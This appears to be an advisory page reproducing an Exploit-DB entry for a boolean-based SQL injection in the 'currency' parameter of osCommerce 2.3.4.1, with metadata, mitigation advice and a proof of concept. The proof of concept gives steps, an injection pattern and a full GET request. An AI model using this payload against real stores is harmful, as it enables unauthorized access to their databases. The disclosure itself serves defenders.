osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities

vendor:

osCommerce Online Merchant

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: osCommerce Online Merchant

Affected Version From: 2.3.4.1

Affected Version To: 2.3.4.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows (tested on Wampp)

2019

osCommerce 2.3.4.1 – ‘currency’ SQL Vulnerabilities

The osCommerce 2.3.4.1 web application is vulnerable to SQL injection. By manipulating the 'currency' parameter in the shopping_cart.php URL, an attacker can inject malicious SQL code and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patches and updates provided by the osCommerce vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################

# Exploit Title: osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities
# Dork: N/A
# Date: 05-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.oscommerce.com
# Software Link: https://www.oscommerce.com/Products
# Version: 2.3.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: osCommerce Online Merchant is a complete online
store solution
  that contains both a shop frontend and an administration backend
  which can be easily configured and customized with over 8,855 free
add-ons.

####################################################################

# Vulnerabilities / Impact
# This web application called as osCommerce 2.3.4.1 version.
# Switch to the shopping_cart tab. Replace the ID value in the url, with a
high number value.
  for example shopping_cart.php?currency=1 change to 9999999
  then add the payload at Attack_pattern to the end of the url.

####################################################################

# POC - SQL (Boolean Based)
# Parameters : currency
# Attack Pattern : %27 oR 3620772=3620772 aNd %276199%27=%276199
# GET Request :
http://localhost/oscommerce/catalog/shopping_cart.php?currency=99999999%27
oR 3620772=3620772 aNd %276199%27=%276199

####################################################################